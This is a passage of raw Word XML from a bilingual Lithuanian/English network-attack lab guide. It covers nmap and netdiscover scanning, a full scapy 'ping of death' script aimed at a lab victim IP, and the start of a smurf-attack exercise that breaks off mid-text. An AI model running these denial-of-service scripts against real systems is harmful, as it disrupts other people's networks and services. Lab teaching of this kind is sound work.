    <w:p w14:paraId="56E3529F" w14:textId="2BB49B1C" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00741093">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412157D8" w14:textId="3C05E326" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00741093">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">There are a couple of network scanning tools: </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9201CB" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00D72201">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5BA343" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00D72201">
      <w:r w:rsidRPr="00352171">
        <w:t>Network scanning with “nmap” – nmap -A 10.0.2.1/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55930500" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00D72201">
      <w:pPr>
        <w:ind w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>* -A – aggressive scan mode (may take a little longer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0433ABAB" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00D72201">
      <w:r w:rsidRPr="00352171">
        <w:t>You will see the full list of devices, their addresses and ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D6A5B" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00D72201">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E33923" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00D72201">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62243FB7" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00D72201">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">** </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD2EB7" w14:textId="3DF745DE" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00D72201">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Network scanning with “netdiscover” –  netdiscover -r 10.0.2.1/24 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E5F726" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00D72201">
      <w:pPr>
        <w:ind w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">* -r – range </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22475063" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00D72201">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">** </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055389FF" w14:textId="77777777" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="00D72201" w:rsidP="00D72201">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Personally I find netdiscover more convenient, but for larger networks nmap is essential due to the high number of devices — so you can know which device has which IP and MAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648ADBEA" w14:textId="55365E19" w:rsidR="008F0E5F" w:rsidRPr="00352171" w:rsidRDefault="008F0E5F" w:rsidP="00741093"/>
    <w:p w14:paraId="21C4BDE0" w14:textId="77777777" w:rsidR="008F0E5F" w:rsidRPr="00352171" w:rsidRDefault="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="317AF5D9" w14:textId="38B8C390" w:rsidR="00D72201" w:rsidRPr="00352171" w:rsidRDefault="008F0E5F" w:rsidP="008F0E5F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>Užduotis Nr. 9</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Exercise 9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1F3B4C" w14:textId="7594142B" w:rsidR="008F0E5F" w:rsidRPr="00352171" w:rsidRDefault="008F0E5F" w:rsidP="008F0E5F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>ICMP mirties ping</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(ICMP Ping of death)</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDA2C6C" w14:textId="58AA506B" w:rsidR="00741548" w:rsidRPr="00352171" w:rsidRDefault="00741548" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18DC01B3" wp14:editId="73282CFC">
            <wp:extent cx="3600450" cy="942975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="945441366"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1366" name="Picture 1" descr="A computer screen shot of white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3600450" cy="942975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A99A95A" w14:textId="52B16AA2" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B549ECB" wp14:editId="182674AF">
            <wp:extent cx="6373114" cy="1781424"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="146200787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7873" name="Picture 1" descr="A computer screen with text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6373114" cy="1781424"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68238D81" w14:textId="3ED5CB10" w:rsidR="00741548" w:rsidRPr="00352171" w:rsidRDefault="00741548" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="675CDB29" wp14:editId="5DF56FFC">
            <wp:extent cx="3296110" cy="695422"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="203756957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9573" name="Picture 1" descr="A black background with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3296110" cy="695422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ADBEBC5" wp14:editId="09D0C04E">
            <wp:extent cx="6645910" cy="1654175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="5512573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7351" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1654175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F01410" w14:textId="77777777" w:rsidR="00741548" w:rsidRPr="00352171" w:rsidRDefault="00741548" w:rsidP="008F0E5F"/>
    <w:p w14:paraId="28664CAB" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="008F0E5F"/>
    <w:p w14:paraId="1D92B271" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="008F0E5F"/>
    <w:p w14:paraId="31C48378" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="008F0E5F"/>
    <w:p w14:paraId="6E3B6CA2" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="008F0E5F"/>
    <w:p w14:paraId="7AE7371D" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="008F0E5F"/>
    <w:p w14:paraId="3C63F12C" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="008F0E5F"/>
    <w:p w14:paraId="594CCDAA" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="008F0E5F"/>
    <w:p w14:paraId="61864E5E" w14:textId="35E72E82" w:rsidR="008F0E5F" w:rsidRPr="00352171" w:rsidRDefault="008F0E5F" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">LT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED2F64C" w14:textId="56BE2BD6" w:rsidR="008F0E5F" w:rsidRPr="00352171" w:rsidRDefault="008F0E5F" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:t>Šios atakos tikslas yra siųsti didelį paketo dydį, kuris yra didesnis negu standartinis. To pasekoje, auka bus stipriai sutrigdyta.</w:t>
      </w:r>
      <w:r w:rsidR="00741548" w:rsidRPr="00352171">
        <w:t xml:space="preserve"> Failą sukuriame su “touch ICMPpod.py” ir redaguojame “nano ICMPpod.py”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8AA61F" w14:textId="11CC25FB" w:rsidR="00741548" w:rsidRPr="00352171" w:rsidRDefault="00741548" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3EA17B" w14:textId="77777777" w:rsidR="00741548" w:rsidRPr="00352171" w:rsidRDefault="00741548" w:rsidP="00741548">
      <w:r w:rsidRPr="00352171">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C5B078" w14:textId="77777777" w:rsidR="00741548" w:rsidRPr="00741548" w:rsidRDefault="00741548" w:rsidP="00741548"/>
    <w:p w14:paraId="420FBBB1" w14:textId="6A0F3834" w:rsidR="00741548" w:rsidRPr="00741548" w:rsidRDefault="00741548" w:rsidP="00741548">
      <w:pPr>
        <w:ind w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00741548">
        <w:t>icmp_request = IP(dst="10.0.2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00741548">
        <w:t>")/ICMP(type=8)/("X" * 6</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>5000</w:t>
      </w:r>
      <w:r w:rsidRPr="00741548">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A055CE" w14:textId="77777777" w:rsidR="00741548" w:rsidRPr="00741548" w:rsidRDefault="00741548" w:rsidP="00741548"/>
    <w:p w14:paraId="5208BE3D" w14:textId="77777777" w:rsidR="00741548" w:rsidRPr="00741548" w:rsidRDefault="00741548" w:rsidP="00741548">
      <w:pPr>
        <w:ind w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00741548">
        <w:t>send(icmp_request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D576B25" w14:textId="70160BB3" w:rsidR="00741548" w:rsidRPr="00352171" w:rsidRDefault="00741548" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEB684A" w14:textId="58597D99" w:rsidR="00741548" w:rsidRPr="00352171" w:rsidRDefault="00741548" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>* dst- Aukos IP adresas</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>* 65000 – Paketo dydis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0EB12B" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="008F0E5F"/>
    <w:p w14:paraId="6BE8D37E" w14:textId="798C35B6" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Toliau atsidarome Wireshark ir paleidžiame skriptą “python ICMPpod.py” ir tada pamatysite, jog ataka suveikė sėkmingai. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2787A5AC" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="008F0E5F"/>
    <w:p w14:paraId="6B9D0F12" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="007917BF" w:rsidRDefault="007917BF" w:rsidP="007917BF">
      <w:r w:rsidRPr="007917BF">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03580B5F" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="007917BF" w:rsidRDefault="007917BF" w:rsidP="007917BF">
      <w:r w:rsidRPr="007917BF">
        <w:t>The purpose of this attack is to send packets with a size larger than the standard. As a result, the victim will be heavily disrupted. Create the file with touch ICMPpod.py and edit it with nano ICMPpod.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA041D" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="007917BF">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123C8170" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="007917BF">
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363E624E" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00741548" w:rsidRDefault="007917BF" w:rsidP="007917BF"/>
    <w:p w14:paraId="124E2228" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00741548" w:rsidRDefault="007917BF" w:rsidP="007917BF">
      <w:pPr>
        <w:ind w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00741548">
        <w:t>icmp_request = IP(dst="10.0.2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00741548">
        <w:t>")/ICMP(type=8)/("X" * 6</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>5000</w:t>
      </w:r>
      <w:r w:rsidRPr="00741548">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A810783" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00741548" w:rsidRDefault="007917BF" w:rsidP="007917BF"/>
    <w:p w14:paraId="230A0229" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00741548" w:rsidRDefault="007917BF" w:rsidP="007917BF">
      <w:pPr>
        <w:ind w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00741548">
        <w:t>send(icmp_request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5201A301" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="007917BF">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2D8FE" w14:textId="3112B4BB" w:rsidR="007917BF" w:rsidRPr="007917BF" w:rsidRDefault="007917BF" w:rsidP="007917BF">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="007917BF">
        <w:t>dst – the victim's IP address</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="007917BF">
        <w:t>65000 – packet size (in bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ED9C6B" w14:textId="1D4196F7" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="007917BF">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="007917BF">
        <w:t xml:space="preserve">Next, open Wireshark and run the script </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007917BF">
        <w:t>python ICMPpod.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="007917BF">
        <w:t>. You will then see that the attack executed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A42A885" w14:textId="3BE7182D" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="007917BF"/>
    <w:p w14:paraId="2B975B34" w14:textId="77777777" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF">
      <w:r w:rsidRPr="00352171">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAD5A5C" w14:textId="3523D83F" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="007917BF">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>Užduotis Nr. 10</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Exercise 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151456B3" w14:textId="3911A1D4" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="007917BF" w:rsidP="007917BF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">ICMP </w:t>
      </w:r>
      <w:r w:rsidR="0087222C" w:rsidRPr="00352171">
        <w:t>smurfo</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> ataka</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t xml:space="preserve">(ICMP </w:t>
      </w:r>
      <w:r w:rsidR="0087222C" w:rsidRPr="00352171">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>murf attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3BB9F1" w14:textId="29A69E8C" w:rsidR="007917BF" w:rsidRPr="00352171" w:rsidRDefault="0087222C" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">LT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11149CB9" w14:textId="65825FF1" w:rsidR="0087222C" w:rsidRPr="00352171" w:rsidRDefault="0087222C" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:t>Šios atakos esmė yra ta, kad panaudojant aukos IP adresą, mes siunčiame pranešimą į visą tinklą. To pasekoje visi įrenginiai tinkle grąžins atsaką aukai taip, jog ją perpildys paketais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF22948" w14:textId="77777777" w:rsidR="0087222C" w:rsidRPr="00352171" w:rsidRDefault="0087222C" w:rsidP="0087222C"/>
    <w:p w14:paraId="67A7E1BD" w14:textId="15453AEC" w:rsidR="0087222C" w:rsidRPr="0087222C" w:rsidRDefault="0087222C" w:rsidP="0087222C">
      <w:r w:rsidRPr="0087222C">
        <w:t xml:space="preserve">EN: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8C0E11" w14:textId="77777777" w:rsidR="0087222C" w:rsidRPr="0087222C" w:rsidRDefault="0087222C" w:rsidP="0087222C">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0087222C">
        <w:t xml:space="preserve">The essence of this attack is that, by spoofing the victim’s IP address, we send a message to the entire network. As a result, all devices on the network will reply to the victim, overwhelming it with packets. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB05053" w14:textId="68217940" w:rsidR="00313315" w:rsidRPr="00352171" w:rsidRDefault="00313315" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67356975" wp14:editId="4BAA4D03">
            <wp:extent cx="3286584" cy="1066949"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="9190884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424" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3286584" cy="1066949"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C332F02" w14:textId="27CFE5D1" w:rsidR="0087222C" w:rsidRPr="00352171" w:rsidRDefault="00313315" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42693BF6" wp14:editId="5864A30C">
            <wp:extent cx="5981700" cy="1924050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="921361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1710" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5981700" cy="1924050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA5C414" w14:textId="21D6FD39" w:rsidR="00313315" w:rsidRPr="00352171" w:rsidRDefault="00313315" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FBD28FB" wp14:editId="14F0F128">
            <wp:extent cx="3991532" cy="1247949"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="2906190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9078" name="Picture 1" descr="A screen shot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3991532" cy="1247949"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F0BB36" w14:textId="632EF106" w:rsidR="00313315" w:rsidRPr="00352171" w:rsidRDefault="00313315" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="048A94CF" wp14:editId="45358744">
            <wp:extent cx="6645910" cy="1885315"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="296890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0129" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1885315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3DB008" w14:textId="4E77A63F" w:rsidR="00313315" w:rsidRPr="00352171" w:rsidRDefault="00313315" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">LT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4CA2C7" w14:textId="3FE88D89" w:rsidR="00313315" w:rsidRPr="00352171" w:rsidRDefault="00313315" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
